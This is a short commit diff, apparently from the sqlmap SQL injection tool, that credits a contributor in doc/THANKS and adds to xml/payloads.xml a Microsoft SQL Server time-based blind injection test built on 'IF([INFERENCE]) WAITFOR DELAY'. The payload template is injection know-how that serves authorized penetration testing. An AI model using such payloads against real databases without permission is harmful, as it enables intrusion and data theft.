added MSSQL time based vector

doc/THANKS

@@ -282,6 +282,10 @@ Adrian Pastor <ap@gnucitizen.org>
 Chris Patten <cpatten@sunera.com>
     for reporting a bug in the blind SQL injection bisection algorithm
 
+Steve Pinkham <steve.pinkham@gmail.com>
+    for suggesting a feature
+    for providing a new sql injection vector (MSSQL time based)
+
 Adam Pridgen <adam.pridgen@gmail.com>
     for suggesting some features
 

xml/payloads.xml

@@ -1700,6 +1700,26 @@ Formats:
         </details>
     </test>
 
+    <test>
+        <title>Microsoft SQL Server/Sybase AND time-based blind</title>
+        <stype>5</stype>
+        <level>1</level>
+        <risk>0</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
+        <request>
+            <payload>WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+        </details>
+    </test>
+
     <test>
         <title>Microsoft SQL Server/Sybase AND time-based blind (heavy query)</title>
         <stype>5</stype>